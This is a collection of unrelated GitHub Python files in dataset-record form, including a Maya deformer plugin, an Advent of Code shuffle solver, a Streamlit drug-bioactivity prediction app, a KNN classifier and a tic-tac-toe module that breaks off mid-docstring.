OpenMaya.MObject()\n\n def __init__(self):\n OpenMayaMPx.MPxDeformerNode.__init__(self)\n self.default_val = False\n\n def get_input_geom(self, data, geom_idx):\n input_attr = data.outputArrayValue(self.input)\n input_handle = data.outputArrayValue(self.input)\n input_handle.jumpToElement(geom_idx)\n input_geom_obj = input_handle.outputValue().child(self.inputGeom).asMesh()\n return input_geom_obj\n\n def getUV_val(self, Source_Loc_xform, mfnMesh, Geo_name):\n loc_point = OpenMaya.MPoint(Source_Loc_xform[0], Source_Loc_xform[1], Source_Loc_xform[2])\n pos = OpenMaya.MPoint()\n mfnMesh.getClosestPoint(loc_point, pos, OpenMaya.MSpace.kWorld)\n #currentUvSet = cmds.polyUVSet(Geo_name, q=True, cuv=True)\n uv_mPoint = OpenMaya.MPoint(pos.x, pos.y, pos.z, 1.0)\n uv = OpenMaya.MScriptUtil()\n uv.createFromList([0.0, 0.0], 2)\n uvPtr = uv.asFloat2Ptr()\n mfnMesh.getUVAtPoint(uv_mPoint, uvPtr, OpenMaya.MSpace.kWorld)\n u_val = uv.getFloat2ArrayItem(uvPtr, 0, 0)\n v_val = uv.getFloat2ArrayItem(uvPtr, 0, 
1)\n return (u_val, v_val)\n\n def get_point_position(self, mfnMesh, geo_name, u, v):\n meshFn = mfnMesh\n faceCount = mfnMesh.numFaceVertices()\n\n # convert uv to ptr\n util = OpenMaya.MScriptUtil()\n util.createFromList((u, v), 2)\n uvPtr = util.asFloat2Ptr()\n\n positionMPoint = OpenMaya.MPoint()\n currentUvSet = []\n meshFn.getUVSetNames(currentUvSet)\n tolerance = 0.01\n\n # check each face for uv\n # worldPos = {'face#': [x,y,z]}\n worldPos = []\n\n for faceIndex in range(faceCount):\n try:\n mfnMesh.getPointAtUV(faceIndex, positionMPoint, uvPtr, OpenMaya.MSpace.kWorld, currentUvSet[0],\n tolerance)\n worldPos.append(positionMPoint.x)\n worldPos.append(positionMPoint.y)\n worldPos.append(positionMPoint.z)\n # worldPos[faceIndex] = (positionMPoint.x, positionMPoint.y, positionMPoint.z)\n except:\n pass\n\n return worldPos\n\n def deform(self,\n data, # dataBlock\n geom_iter, # geom iteration class instance\n matrix, # local to worl matrix\n geom_index):\n\n # query the geo\n connected_mesh = data.inputValue(self.connected_mesh).asMesh()\n strength = data.inputValue(self.strength).asFloat()\n snap_offset = data.inputValue(self.snap_offset).asShort()\n envelope = data.inputValue(self.envelope).asFloat()\n\n thisNode = self.thisMObject()\n socketNode = OpenMaya.MFnDependencyNode(thisNode)\n\n node_name = socketNode.name()\n #geo_name = self.deformer_class.getAffectedGeometry(node_name).keys()[0]\n\n input_mesh = self.get_input_geom(data, geom_index)\n input_mfnMesh = OpenMaya.MFnMesh(input_mesh)\n input_mpointArray = OpenMaya.MPointArray()\n input_mfnMesh.getPoints(input_mpointArray, OpenMaya.MSpace.kWorld)\n\n connected_mfnmesh = OpenMaya.MFnMesh(connected_mesh)\n connected_mpointArray = OpenMaya.MPointArray()\n connected_mfnmesh.getPoints(connected_mpointArray, OpenMaya.MSpace.kWorld)\n connected_geo_name = cmds.listConnections(node_name + '.ConnectMesh')[0]\n\n value = cmds.listConnections(node_name + '.ConnectMesh')\n if self.default_val == False:\n if value != None:\n\n self.vtx_default_pos = {}\n self.uv_pos = {}\n\n for i in range(input_mpointArray.length()):\n x_val = input_mpointArray[i].x\n y_val = input_mpointArray[i].y\n z_val = input_mpointArray[i].z\n world_pos_val = [x_val, y_val, z_val]\n u, v = self.getUV_val(Source_Loc_xform=world_pos_val,\n mfnMesh=connected_mfnmesh,\n Geo_name=connected_geo_name)\n\n position = self.get_point_position(mfnMesh=connected_mfnmesh,\n geo_name=connected_geo_name,\n u=u,\n v=v)\n\n self.vtx_default_pos[i] = position\n self.uv_pos[i] = [u, v]\n self.default_val = True\n if snap_offset == 1:\n a = 0\n mpoint_mesh_Array = OpenMaya.MPointArray()\n while (geom_iter.isDone() == False):\n new_x_val = self.vtx_default_pos[a][0]\n new_y_val = self.vtx_default_pos[a][1]\n new_z_val = self.vtx_default_pos[a][2]\n\n pt = OpenMaya.MPoint(new_x_val, new_y_val, new_z_val)\n mpoint_mesh_Array.append(pt)\n a += 1\n geom_iter.next()\n geom_iter.setAllPositions(mpoint_mesh_Array)\n\n else:\n a = 0\n mpoint_mesh_Array = OpenMaya.MPointArray()\n while (geom_iter.isDone() == False):\n weight = self.weightValue(data, geom_index, geom_iter.index())\n pointPosition = geom_iter.position()\n u_v_val = self.uv_pos[a]\n position = self.get_point_position(mfnMesh=connected_mfnmesh,\n geo_name=connected_geo_name,\n u=u_v_val[0],\n v=u_v_val[1])\n\n x_diff = (position[0] - self.vtx_default_pos[a][0]) * strength * envelope * weight\n y_diff = (position[1] - self.vtx_default_pos[a][1]) * strength * envelope * weight\n z_diff = (position[2] - self.vtx_default_pos[a][2]) * 
strength * envelope * weight\n\n                new_env = envelope - 1\n                snap_x_val = (position[0] - pointPosition.x) * new_env\n                snap_y_val = (position[1] - pointPosition.y) * new_env\n                snap_z_val = (position[2] - pointPosition.z) * new_env\n\n                if snap_offset == 0:\n                    new_x_val = pointPosition.x + x_diff\n                    new_y_val = pointPosition.y + y_diff\n                    new_z_val = pointPosition.z + z_diff\n                if snap_offset == 1:\n                    new_x_val = position[0] + snap_x_val\n                    new_y_val = position[1] + snap_y_val\n                    new_z_val = position[2] + snap_z_val\n\n                pt = OpenMaya.MPoint(new_x_val, new_y_val, new_z_val)\n                mpoint_mesh_Array.append(pt)\n                # geom_iter.setPosition( pt )\n                a += 1\n                geom_iter.next()\n            geom_iter.setAllPositions(mpoint_mesh_Array)\n\n\ndef creator():\n    return OpenMayaMPx.asMPxPtr(BLENDWRRAP())\n\n\ndef initialize():\n    nAttr = OpenMaya.MFnNumericAttribute()\n    nMAttr = OpenMaya.MFnMatrixAttribute()\n    cAttr = OpenMaya.MFnCompoundAttribute()\n    tAttr = OpenMaya.MFnTypedAttribute()\n    eAttr = OpenMaya.MFnEnumAttribute()\n\n    # string attr\n\n    BLENDWRRAP.strength = nAttr.create(\"strength\", \"str\", OpenMaya.MFnNumericData.kFloat, 1.0)\n    nAttr.setKeyable(True)\n\n    BLENDWRRAP.connected_mesh = tAttr.create('ConnectMesh', 'cm', OpenMaya.MFnData.kMesh)\n    tAttr.setWritable(True)\n    tAttr.setStorable(True)\n    tAttr.setReadable(True)\n    tAttr.setKeyable(True)\n\n    BLENDWRRAP.snap_offset = eAttr.create(\"Condition\", \"con\", 0)\n    eAttr.addField(\"offset\", 0)\n    eAttr.addField(\"snap\", 1)\n    eAttr.setHidden(False)\n    eAttr.setKeyable(True)\n    eAttr.setStorable(True)\n\n    BLENDWRRAP.addAttribute(BLENDWRRAP.strength)\n    BLENDWRRAP.addAttribute(BLENDWRRAP.connected_mesh)\n    BLENDWRRAP.addAttribute(BLENDWRRAP.snap_offset)\n\n    outputGeom = OpenMayaMPx.cvar.MPxGeometryFilter_outputGeom\n    BLENDWRRAP.attributeAffects(BLENDWRRAP.strength, outputGeom)\n    BLENDWRRAP.attributeAffects(BLENDWRRAP.connected_mesh, outputGeom)\n    BLENDWRRAP.attributeAffects(BLENDWRRAP.snap_offset, outputGeom)\n\n    cmds.makePaintable(BLENDWRRAP.kPluginNodeName, 'weights', attrType='multiFloat', shapeMode='deformer')\n\n\ndef initializePlugin(obj):\n    plugin = OpenMayaMPx.MFnPlugin(obj)\n    try:\n        plugin.registerNode(BLENDWRRAP.kPluginNodeName,\n                            BLENDWRRAP.kPluginNodeId,\n                            creator,\n                            initialize,\n                            OpenMayaMPx.MPxNode.kDeformerNode)\n    except:\n        raise RuntimeError(\"Failed to register node: %s\" % BLENDWRRAP.kPluginNodeName)\n\n\ndef uninitializePlugin(obj):\n    plugin = OpenMayaMPx.MFnPlugin(obj)\n    try:\n        plugin.deregisterNode(BLENDWRRAP.kPluginNodeId)\n    except:\n        raise RuntimeError(\"Failed to deregister node: %s\" % BLENDWRRAP.kPluginNodeName)\n","repo_name":"NikheelP/Spark_","sub_path":"spark/department/CFX/deformer/blendWrap.py","file_name":"blendWrap.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4033339453","text":"def somar(a=0, b=0, c=0):\n    s = a + b + c\n    return s\n\n# Main program\nr1 = somar(3)\nr2 = somar(3, 2)\nr3 = somar(3, 2, 5)\n\nprint('The results were {}, {} and {}'.format(r1, r2, r3))\n\n","repo_name":"ascaniopy/python","sub_path":"Modulo III/aula021-funcaoComRetorno.py","file_name":"aula021-funcaoComRetorno.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38104188273","text":"\r\n\r\n\r\n#tip calculator\r\n\r\nprint(\"welcome to the tip calculator \")\r\n\r\nbill = float(input(\"what was the total bill \"))\r\n\r\ntip = int(input(\"what percentage tip would you like to give ? 
10, 12, or 15 \"))\r\n\r\nsplit = int(input(\"how many people to split the bill \"))\r\n\r\nadd_tip = (tip/100*bill)\r\n\r\nfinal_bill = bill + add_tip\r\n\r\nsplite_bill = final_bill / split\r\n\r\nspliting = \"{:.2f}\".format(splite_bill)\r\n\r\nprint(f\"each person should pay {spliting}\")\r\n","repo_name":"5umitmishra/basic_python","sub_path":"tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"776268771","text":"import os\nfrom collections import OrderedDict\nimport simplejson as json\n\nfrom config import Config\n\n\nclass SensorGenerator:\n    def __init__(self, juice_config: Config):\n        self.juice_config = juice_config\n\n    def _generate_sensor_json(self, instrument_name: str, sensor_name: str, target_name: str) -> OrderedDict:\n        \"\"\" Creates a sensor JSON with all necessary entries.\n\n        :param instrument_name: Name of instrument (e.g. \"MAJIS\")\n        :param sensor_name: Name of sensor (e.g. \"JUICE_MAJIS_IR\")\n        :param target_name: Name of target body (e.g. \"Callisto\")\n        :return: sensor JSON as OrderedDict\n        \"\"\"\n        sensor_json = self.juice_config.get_template_sensor()\n        edit_entry = sensor_json[\"items\"][0]\n        edit_entry[\"name\"] = sensor_name\n        edit_entry[\"geometry\"][\"instrName\"] = sensor_name\n        edit_entry[\"geometry\"][\"target\"] = target_name\n        edit_entry[\"geometry\"][\"frustumColor\"] = \\\n            self.juice_config.get_sensor_colors()[instrument_name]\n        return sensor_json\n\n    def generate_sensors(self, observation_dict: OrderedDict, target_name: str, output_folder_path: str) -> None:\n        \"\"\" Generates and saves all necessary sensor JSON files for given observation.\n\n        :param observation_dict: Dictionary generated by TimelineProcessor\n        :param target_name: Name of target body (e.g. 
\"Callisto)\n :param output_folder_path: Path to already created output folder.\n \"\"\"\n # If you change the filenames, you need to change the TimelineProcessor as well\n sensor_folder_path = os.path.abspath(os.path.join(output_folder_path, \"sensors\"))\n os.makedirs(sensor_folder_path)\n for instrument_name, sensor_dict in observation_dict.items():\n for sensor_name in sensor_dict:\n sensor_json = self._generate_sensor_json(instrument_name,\n sensor_name, target_name)\n sensor_json_name = \"sensor_{}_{}.json\".format(sensor_name, target_name)\n with open(os.path.join(sensor_folder_path, sensor_json_name), 'w+') as outfile:\n json.dump(sensor_json, outfile, indent=2)\n","repo_name":"MStefko/ESA-Mapps2Cosmographia","sub_path":"timeline_processor/sensor_generator.py","file_name":"sensor_generator.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31814473235","text":"\n\n\ndef new_stack(deck):\n return deck[::-1]\n\ndef cut(deck, index):\n return deck[index:] + deck[:index]\n\ndef deal_with_increment(deck, increment):\n new_deck = [False] * len(deck)\n index = 0\n for card in deck:\n new_deck[index] = card\n index += increment\n index = index % len(deck)\n\n return new_deck\n\ndef shuffle(deck, instructions):\n for instruction in instructions:\n if instruction == \"deal into new stack\":\n deck = new_stack(deck)\n elif instruction.startswith(\"cut\"):\n deck = cut(deck, int(instruction.split()[-1]))\n elif instruction.startswith(\"deal with increment\"):\n deck = deal_with_increment(deck, int(instruction.split()[-1]))\n return deck\n\n\nif __name__ == '__main__':\n instructions = [\n 'deal with increment 7',\n 'deal into new stack',\n 'deal into new stack',\n ]\n assert(shuffle(list(range(10)), instructions) == [0, 3, 6, 9, 2, 5, 8, 1, 4, 7])\n\n instructions = [\n 'cut 6',\n 'deal with increment 7',\n 'deal into new stack',\n ]\n assert(shuffle(list(range(10)), instructions) == [3, 0, 7, 4, 1, 8, 5, 2, 9, 6])\n\n instructions = [\n 'deal into new stack',\n 'cut -2',\n 'deal with increment 7',\n 'cut 8',\n 'cut -4',\n 'deal with increment 7',\n 'cut 3',\n 'deal with increment 9',\n 'deal with increment 3',\n 'cut -1',\n ]\n assert(shuffle(list(range(10)), instructions) == [9, 2, 5, 8, 1, 4, 7, 0, 3, 6])\n\n instructions = [a.strip() for a in open('day22.input').readlines()]\n\n print('Part 1:', shuffle(list(range(10007)), instructions).index(2019))\n\n # Part 2\n\n deck = list(range(119315717514047))\n for _ in range(101741582076661):\n deck = shuffle(deck, instructions)\n\n print(\"Part 2:\", deck[2020])\n","repo_name":"CheeseTheMonkey/AdventOfCode","sub_path":"2019/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5439623027","text":"#!/usr/bin/env python\n# Created by Kevin M\nimport grovepi\n\n#Parameter: Ports of input, in order from left, middle right\n#Output: Distance from object being viewed in order of left, middle, right\ngrovepi.set_bus(\"RPI_1\")\n\ndef ultraread(portL,portM,portR):\n try:\n reading = [grovepi.ultrasonicRead(portL),grovepi.ultrasonicRead(portM),grovepi.ultrasonicRead(portR)]\n #print(type(reading))\n return reading\n except Exception as e:\n print (\"Error is 
{}\".format(e))\n","repo_name":"mghera02/Engr162Proj3","sub_path":"usRead.py","file_name":"usRead.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73214756401","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'zhwei'\n\nfrom ..patient.models import Patient\nfrom ..region.models import LivingRegion\nfrom ..volunteer.models import Volunteer\nfrom ..medical.models import Hospital, Doctor\n\ndef set_user_identity(user, key):\n \"\"\" 为用户设置角色\n \"\"\"\n _dic = {\n 'patient': Patient,\n 'doctor': Doctor,\n 'hospital': Hospital,\n 'volunteer': Volunteer,\n # 5: ('druggist')\n }\n if 'patient' == key: user.is_patient = True\n if 'doctor' == key: user.is_doctor = True\n if 'hospital' == key: user.is_hospital = True\n if 'volunteer' == key: user.is_volunteer = True\n _dic[key].objects.create(user=user)\n return True\n\n\ndef set_user_region(user, cate, province, city, area):\n \"\"\" 设置用户住址\n \"\"\"\n _region = LivingRegion.objects.get_or_create(user_id=user.id, cate=cate)[0]\n _region.province, _region.city, _region.area = province, city, area\n _region.save()\n return _region","repo_name":"sdutlinux/pahchina","sub_path":"pahchina/apps/accounts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"4472608535","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 17 08:28:57 2021\r\n\r\n@author: OLUWABUSUYI\r\n\"\"\"\r\n\r\nclass budget:\r\n \r\n def __init__(self, name, dep_amt, with_amt, bal ):\r\n self.name = name\r\n self.dep_amt = dep_amt\r\n self.with_amt = with_amt\r\n self.bal = bal\r\n \r\n def deposit(self):\r\n print (f'The {self.name} deposit is {self.dep_amt} ')\r\n \r\n def withdrawal(self):\r\n print (f'The {self.name} withdrawal is {self.with_amt}')\r\n \r\n def balance (self):\r\n print (f'The {self.name} balance is {self.bal}')\r\n \r\n def transfer (self):\r\n print (f'The maximum amount to be transferred from {self.name} to another category is {self.bal}')\r\n print (' ')\r\n \r\n\r\n\r\nbudget_1 = budget('food', 10000, 2000, 8000)\r\nbudget_1.deposit ()\r\nbudget_1.withdrawal()\r\nbudget_1.balance ()\r\nbudget_1.transfer()\r\n\r\nbudget_2 = budget('clothing', 5000, 2000, 3000)\r\nbudget_2.deposit ()\r\nbudget_2.withdrawal()\r\nbudget_2.balance ()\r\nbudget_2.transfer()\r\n\r\nbudget_3 = budget('entertainment', 1000, 500, 500)\r\nbudget_3.deposit ()\r\nbudget_3.withdrawal()\r\nbudget_3.balance ()\r\nbudget_3.transfer()\r\n ","repo_name":"Oluwabusuyi1/zuri_oop","sub_path":"OOP.py","file_name":"OOP.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34798888435","text":"\n\ndef get_range(nums, start, end):\n end %= len(nums)\n\n return nums[start:] + nums[:end] if end <= start else nums[start:end]\n\ndef set_range(nums, values, start, end):\n end %= len(nums)\n\n if end <= start:\n nums[start:] = values[:len(nums) - start]\n nums[:end] = values[len(nums) - start:]\n else:\n nums[start:end] = values\n return nums\n\ndef reverse_range(nums, start, end):\n return set_range(nums, list(reversed(get_range(nums, start, end))), start, end)\n\ndef pad_left(num):\n num = str(num)\n while len(num) < 2:\n num = '0' + num\n\n return num\n\ndef xor(nums):\n return eval(\n str(nums)\n .replace('[', '')\n .replace(']', '')\n 
.replace(',', ' ^')\n    )\n\n\ndef knot_hash(string):\n    lengths = list(map(ord, string)) + [17, 31, 73, 47, 23]\n    nums = list(range(256))\n    position = 0\n    skip_size = 0\n\n    for _ in range(64):\n        for length in lengths:\n            if length != 0:\n                reverse_range(nums, position, position + length)\n            position += length + skip_size\n            position %= len(nums)\n            skip_size += 1\n    return ''.join(pad_left(hex(knot_hash).replace('0x', '')) for knot_hash in (xor(nums[i * 16:i * 16 +16]) for i in range(16)))\n\nif __name__ == '__main__':\n    print(knot_hash('147,37,249,1,31,2,226,0,161,71,254,243,183,255,30,70'))\n","repo_name":"gallyamb/advent-of-code","sub_path":"2017/10.2.day.py","file_name":"10.2.day.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5393777360","text":"import tensorflow as tf\n\ninit_val = tf.random_normal(shape=(1, 5), mean=0, stddev=1)\n# var = tf.Variable(init_val, name='var')\nvar = tf.get_variable(name='var', shape=(1, 5), initializer=tf.random_normal_initializer(mean=0, stddev=1))\nwith tf.variable_scope(name_or_scope='', reuse=True):\n    \"\"\"Using tf.variable_scope lets us share variables.\"\"\"\n    var_1 = tf.get_variable(name='var')\nprint('pre run: \\n{}'.format(var))\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n    sess.run(init)\n    post_var, post_var_1 = sess.run([var, var_1])\n\nprint('\\npost run: \\n{}'.format(post_var))\nprint('\\npost run: \\n{}'.format(post_var_1))","repo_name":"foru120/PythonRepository","sub_path":"Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Variable.py","file_name":"subchapter_03_04_Variable.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33364451310","text":"# Import Libraries\n\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\nimport pickle\nfrom rdkit import Chem\nfrom rdkit.Chem import Descriptors, Lipinski\nimport subprocess\nimport os\nimport base64\n\n# Molecular descriptor calculator\ndef desc_calc():\n    # Performs the descriptor calculation\n    bashCommand = \"java -Xms2G -Xmx2G -Djava.awt.headless=true -jar ./PaDEL-Descriptor/PaDEL-Descriptor.jar -removesalt -standardizenitro -fingerprints -descriptortypes ./PaDEL-Descriptor/PubchemFingerprinter.xml -dir ./ -file descriptors_output.csv\"\n    process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n    output, error = process.communicate()\n    os.remove('molecule.smi')\n\n# Lipinski Descriptor calculator\ndef lipinski(smiles, verbose=False):\n\n    moldata= []\n    for elem in smiles:\n        mol=Chem.MolFromSmiles(elem)\n        moldata.append(mol)\n\n    baseData= np.arange(1,1)\n    i=0\n    for mol in moldata:\n\n        desc_MolWt = Descriptors.MolWt(mol)\n        desc_NumHDonors = Lipinski.NumHDonors(mol)\n        desc_NumHAcceptors = Lipinski.NumHAcceptors(mol)\n\n        row = np.array([desc_MolWt,\n                        desc_NumHDonors,\n                        desc_NumHAcceptors])\n\n        if(i==0):\n            baseData=row\n        else:\n            baseData=np.vstack([baseData, row])\n        i=i+1\n\n    columnNames=[\"MW\",\"NumHDonors\",\"NumHAcceptors\"]\n    descriptors = pd.DataFrame(data=baseData,columns=columnNames)\n\n    return descriptors\n\n# File download\ndef filedownload(df):\n    csv = df.to_csv(index=False)\n    b64 = base64.b64encode(csv.encode()).decode() # strings <-> bytes conversions\n    href = f'<a href=\"data:file/csv;base64,{b64}\" download=\"prediction.csv\">Download Predictions</a>'\n    return href\n\n# Model building\ndef build_model(input_data):\n    # Reads in saved regression model\n    load_model = 
pickle.load(open('aromtase_model.pkl', 'rb'))\n    # Apply model to make predictions\n    prediction = load_model.predict(input_data)\n    st.header('**Prediction output**')\n    prediction_output = pd.Series(prediction, name='pIC50')\n    molecule_name = pd.Series(load_data[1], name='molecule_name')\n    df = pd.concat([molecule_name, prediction_output], axis=1)\n    st.write(df)\n    st.markdown(filedownload(df), unsafe_allow_html=True)\n\n# Page title\nst.markdown(\"\"\"\n# Aromatase Bioactivity Prediction App\nThis app allows you to predict how effective a compound is at inhibiting the `Aromatase` enzyme. `Aromatase` is a drug target for Breast Cancer.\n**Credits**\n- App built in `Python` + `Streamlit` by [Gowrav Mannem](https://www.linkedin.com/in/gowrav-mannem-830896218/).\n- Adopted from Chanin Nantasenamat's (AKA [Dataprofessor](https://github.com/dataprofessor)) [Youtube Tutorial](https://www.youtube.com/watch?v=jBlTQjcKuaY&t=4960s)\n- Descriptor calculated using [PaDEL-Descriptor](http://www.yapcwsoft.com/dd/padeldescriptor/).\n- Lipinski Descriptors found using [RDKit](https://www.rdkit.org/).\n---\n\"\"\")\n\n# Sidebar\nwith st.sidebar.header('1. Upload your CSV data'):\n    uploaded_file = st.sidebar.file_uploader(\"Upload your input file\", type=['txt'])\n    st.sidebar.markdown(\"\"\"\n[Example input file](https://raw.githubusercontent.com/dataprofessor/bioactivity-prediction-app/main/example_acetylcholinesterase.txt)\n\"\"\")\n# User starts prediction process\nif st.sidebar.button('Predict'):\n    # reading input data\n    load_data = pd.read_table(uploaded_file, sep=' ', header=None)\n    load_data.to_csv('molecule.smi', sep = '\\t', header = False, index = False)\n\n    # printing out input data\n    st.header('**Original input data**')\n    st.write(load_data)\n\n    # animation\n    with st.spinner(\"Calculating descriptors...\"):\n        desc_calc()\n\n    # Read in calculated descriptors and display the dataframe\n    st.header('**Calculated Fingerprint descriptors**')\n    fp_desc = pd.read_csv('descriptors_output.csv')\n    st.write(fp_desc)\n    st.write(fp_desc.shape)\n\n    # Read in Lipinski descriptors\n    lipinski_df=lipinski(load_data)\n    st.header('**Calculated Lipinski Descriptors**')\n    st.write(lipinski_df)\n    st.write(lipinski_df.shape)\n\n    # combining the two dataframes\n    aromatase_XY = pd.concat([fp_desc, lipinski_df], axis=1).reindex(fp_desc.index)\n    # Read descriptor list used in previously built model\n    st.header('**Combining the two dataframes and dropping Low variance features**')\n    Xlist = list(pd.read_csv('descriptor_list.csv').columns)\n    desc_subset = aromatase_XY[Xlist]\n    st.write(desc_subset)\n    st.write(desc_subset.shape)\n\n    # Apply trained model to make prediction on query compounds\n    build_model(desc_subset)\nelse:\n    st.info('Upload input data in the sidebar to start!')\n","repo_name":"gowravmannem/Aromatase-Drug-Discovery","sub_path":"stream_lit_app.py","file_name":"stream_lit_app.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19005015957","text":"import csv \n\n# Compute the approximate distance between two points\ndef hitung_perkiraan(x, y):\n\treturn abs(x['x1'] - y['x1']) + abs(x['x2'] - y['x2']) + abs(x['x3'] - y['x3']) + abs(x['x4'] - y['x4']) + abs(x['x5'] - y['x5'])\n\n# Predict data from the datasets\ndef prediksi_data(nilai, data, x):\n\tdaftar_perkiraan = [{'hitung_perkiraan': float('inf')}]\n\tfor dataset in data:\n\t\thasil = hitung_perkiraan(nilai, dataset)\n\t\tif hasil < 
daftar_perkiraan[-1]['hitung_perkiraan']:\n\t\t\tif len(daftar_perkiraan) >= x:\n\t\t\t\tdaftar_perkiraan.pop()\n\t\t\ti = 0\n\t\t\twhile i < len(daftar_perkiraan)-1 and hasil >= daftar_perkiraan[i]['hitung_perkiraan']:\n\t\t\t\ti += 1\n\t\t\tdaftar_perkiraan.insert(i, {'hitung_perkiraan': hasil, 'Y': dataset['Y']})\n\tdaftar_nilai = list(map(lambda x: x['Y'], daftar_perkiraan))\n\treturn max(daftar_nilai, key=daftar_nilai.count)\n\n# Write the output data to a csv file\ndef hasil_file_csv(file_data, datacsv):\n\twith open(file_data, mode='w', newline='') as csv_output:\n\t\tcsv_file = csv.writer(csv_output)\n\t\tcsv_file.writerows(datacsv)\n\n# Classify the test data based on the data in the DataTrain file\ndef hasil_klasifikasi(data_test, data_train, k):\n\tfor d_test in data_test:\n\t\td_test['Y'] = prediksi_data(d_test, data_train, k)\n\thasil_file_csv('TebakanTugas3.csv', map(lambda x: [x['Y']], data_test)) # Generate the csv file\n\n# Function to read data from a csv file \ndef baca_input_csv(f, kondisi=False):\n\tdataset = [] # create an empty array to hold the values read from the csv file\n\twith open(f) as csv_input:\n\t\tbaca_csv = csv.DictReader(csv_input, skipinitialspace=True)\n\t\tfor baris in baca_csv:\n\t\t\tdataset.append({'i': int(baris['Index']), 'x1': float(baris['X1']), 'x2': float(baris['X2']), 'x3': float(baris['X3']), 'x4': float(baris['X4']), 'x5': float(baris['X5']), 'Y': int(baris['Y']) if kondisi else baris['Y']}) \n\treturn dataset\n\n# Main program to run the functions defined above\nif __name__ == '__main__':\n\thasil_klasifikasi(baca_input_csv('DataTest_Tugas3_AI.csv'), baca_input_csv('DataTrain_Tugas3_AI.csv', kondisi=True), 15) # Parameter value k = 15\n","repo_name":"mfaridzia/knn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39483776291","text":"__author__ = \"Benjamin Carpenter\", \"Landon Stoner\", \"Alex VanMannen\"\n\n\"\"\"\nttt_logic\n    This module contains the logic to drive a two-player Tic-Tac-Toe\n    game.\n\"\"\"\n\n'''\n---------------------------------------------------------------\n  Define any global variables this module may need to maintain the\n  state of a Tic-Tac-Toe game.\n---------------------------------------------------------------\n'''\n\nNW = None\nN = None\nNE = None\nW = None\nC = None\nE = None\nSW = None\nS = None\nSE = None\nplayer = \"X\"\n\ndef check_status():\n    \"\"\"\n    Checks to see if either player has won or if the board is filled. \n    Returns a two-tuple in which the first component is the string\n    \"X\" or the string \"O\" or the value None; the second component\n    of the tuple is one of the following strings that indicates the\n    Tic-Tac-Toe board's status:\n        \"Playing\"     No one has won and a move is available\n        \"Win_NW_NE\"   Win across top row\n        \"Win_W_E\"     Win across middle row\n        \"Win_SW_SE\"   Win across bottom row\n        \"Win_NW_SW\"   Win along left column\n        \"Win_N_S\"     Win along center column\n        \"Win_NE_SE\"   Win along right column\n        \"Win_NW_SE\"   Win from left-top corner to right-bottom \n        \"Win_NE_SW\"   Win from right-top corner to left-bottom \n        \"Draw\"        All squares filled with no winner\n    The first component of the resulting tuple represents the game\n    winner, and the second component of the tuple represents the\n    winning configuration. 
If the status component is \"Playing\" or\n \"Draw\", the winner component should be None; for example, the\n tuple (\"X\", \"Win_NE_SE\") would be a valid return value, but\n neither (\"X\", \"Draw\") nor (\"O\", \"Playing\") represents a valid\n result. \n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE, wnr\n if NW == N and N == NE and NW == \"X\":\n return \"X\", 'Win_NW_NE'\n elif W == C and C == E and W == \"X\":\n return \"X\", \"Win_W_E\"\n elif SW == S and S == SE and SW == \"X\":\n return \"X\", \"Win_SW_SE\"\n elif NW == W and W == SW and NW == \"X\":\n return \"X\", \"Win_NW_SW\"\n elif N == C and C == S and N == \"X\":\n return \"X\", \"Win_N_S\"\n elif NE == E and E == SE and NE == \"X\":\n return \"X\", \"Win_NE_SE\"\n elif NW == C and C == SE and NW == \"X\":\n return \"X\", \"Win_NW_SE\"\n elif SW == C and C == NE and SW == \"X\":\n return \"X\", \"Win_NE_SW\"\n elif NW == N and N == NE and NW == \"O\":\n return \"O\", \"Win_NW_NE\"\n elif W == C and C == E and W == \"O\":\n return \"O\", \"Win_W_E\"\n elif SW == S and S == SE and SW == \"O\":\n return \"O\", \"Win_SW_SE\"\n elif NW == W and W == SW and NW == \"O\":\n return \"O\", \"Win_NW_SW\"\n elif N == C and C == S and N == \"O\":\n return \"O\", \"Win_N_S\"\n elif NE == E and E == SE and NE == \"O\":\n return \"O\", \"Win_NE_SE\"\n elif NW == C and C == SE and NW == \"O\":\n return \"O\", \"Win_NW_SE\"\n elif SW == C and C == NE and SW == \"O\":\n return \"O\", \"Win_NE_SW\"\n elif NW is not None and N is not None and NE is not None and W is not None and C is not None and E is not None and SW is not None and S is not None and SE is not None:\n return None, \"Draw\"\n else:\n return None, \"Playing\" # Replace with your implementation\n\n\ndef move(location):\n \"\"\"\n Places the current 